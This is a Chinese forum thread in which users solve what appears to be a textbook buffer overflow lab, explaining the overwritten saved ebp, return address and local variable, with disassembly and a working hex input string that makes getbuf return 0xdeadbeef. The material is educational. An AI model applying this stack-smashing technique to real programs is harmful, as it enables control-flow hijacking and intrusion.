【好玩】缓冲区溢出攻击实验

converse

看到win_hate作出来了，我也不能闲着了，也做了一个玩玩。

我用cygwin测试的结果，注意在gdb中我打印出来的值，这些就是要修改的地方。
另外要注意的是这里的ebp是在getbuf中的，所以这里给出的数据也是相对于getbuf栈帧的数据。

它们分别是
1)$ebp:test栈帧的地址，当调用getbuf函数的时候要压入栈保存，这里要原封不动的写出来
2)$ebp+4：从getbuf函数中返回以后执行的指令的下一个指令的地址，注意原来的值是0x401183,可是我写回去的时候变成了0x401186,详细的说明见我下面的说明。
3)$ebp+32和$ebp+36，我不知道为什么还要写入这两个值，因为我认为改动只要到修改val的值就够了，可是这样会出错的，见我下面的说明。

converse

说明一下修改的地方吧，如下，注意我的机子是小端法表示的：
1）d8ef2200：用小端法就是0x22efd8，这个是test栈帧的ebp的值，在调用getbuf的时候压入栈中保存，这里要原封不动的写出来。
2）86114000：先看看test函数的反汇编代码吧，如下:

1. 
   
2. 00000115 <_test>;:
   
3. 115:        55                           push   %ebp
   
4. 116:        89 e5                        mov    %esp,%ebp
   
5. 118:        83 ec 18                     sub    $0x18,%esp
   
6. 11b:        c7 04 24 ee 00 00 00         movl   $0xee,(%esp)
   
7. 122:        e8 00 00 00 00               call   127 <_test+0x12>;
   
8. 127:        e8 aa ff ff ff               call   d6 <_getbuf>;
   
9. 12c:        89 45 fc                     mov    %eax,0xfffffffc(%ebp) ;从getbuf函数中返回就执行这个指令。
   
10. 12f:        8b 45 fc                     mov    0xfffffffc(%ebp),%eax
    
11. 132:        89 44 24 04                  mov    %eax,0x4(%esp)
    
12. 136:        c7 04 24 ff 00 00 00         movl   $0xff,(%esp)
    
13. 13d:        e8 00 00 00 00               call   142 <_test+0x2d>;
    
14. 142:        c9                           leave  
    
15. 143:        c3                           ret   
    

复制代码

12c中的指令mov    %eax,0xfffffffc(%ebp) 是从getbuf函数中返回的时候就要执行的指令，指令长度为3个字节，因为指令的编码是89 45 fc，我们的改动必须跳过这个指令。
因此我们求出ebp+4的内容，这个内容就是这个指令的执行地址，把这个地址加3就是下一个指令即

1. 
   
2. 12f:        8b 45 fc                     mov    0xfffffffc(%ebp),%eax
   

复制代码

的地址。
因此，86114000用小端法表示就是0x401186就是下一条指令的地址。

3）efbeadde：向局部变量val写入我们要修改的值。

converse

见这副图，如果我输入的值只到0xdeadbeef的时候程序就会出现"segmentation fault",win_hate能解释一下为什么吗？？

afministrator

啊，没有看明白呀

win_hate

[quote]原帖由 "converse"]见这副图，如果我输入的值只到0xdeadbeef的时候程序就会出现"segmentation fault",win_hate能解释一下为什么吗？？[/quote 发表：


val 后面是 test 栈帧中的保存 ebp 值和返回地址，在 getxs 中最后部分有一句

1. 
   
2. *sp++ = '\0';
   

复制代码

会破坏保存的 ebp 值

converse

原帖由 "win_hate" 发表：

会破坏保存的 ebp 值

明白了,最后的两个32位的字符串，一个是main函数的ebp的值，一个是从test函数中返回后main函数的下一条指令的地址。

converse

还有一个问题，就是从键盘输入字符串的时候，这里输入的字符串到底是存放在哪里的？这个输入一直要到输入回车键的时候才开始输入到buf数组中吧？

aero

^_^，偶也做出来了。地址是用gdb看出来的。要是能计算出来就好了。
另，converse，你是用什么反汇编的啊？怎么让指令和机器码一同显示啊？就是像debug那样。

1. 
   
2. [yangwl:/home/users50/yangwl/test/converse]$ ./a.out
   
3. Type Hex string:12 23 34 45 56 67 78 89 90 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 f8 ef ff bf ca 84 04 08 12 23 34 45 ef be ad de e8 fb ff bf 1f 85 04 08
   
4. getbuf returned 0xdeadbeef
   
5. [yangwl:/home/users50/yangwl/test/converse]$ gcc -v
   
6. Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
   
7. Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
   
8. Thread model: posix
   
9. gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
   
10. [yangwl:/home/users50/yangwl/test/converse]$ uname -a
    
11. Linux db2 2.4.18-14smp #1 SMP Wed Sep 4 12:34:47 EDT 2002 i686 i686 i386 GNU/Linux
    
12. [yangwl:/home/users50/yangwl/test/converse]$
    

复制代码

converse

[quote]原帖由 "aero"] 另，converse，你是用什么反汇编的啊？怎么让指令和机器码一同显示啊？就是像debug那样。[/quote 发表：

首先是 gcc -c参数产生目标代码文件，然后用objdump -D就可以反汇编目标文件了

aero

哈哈，学到，谢谢。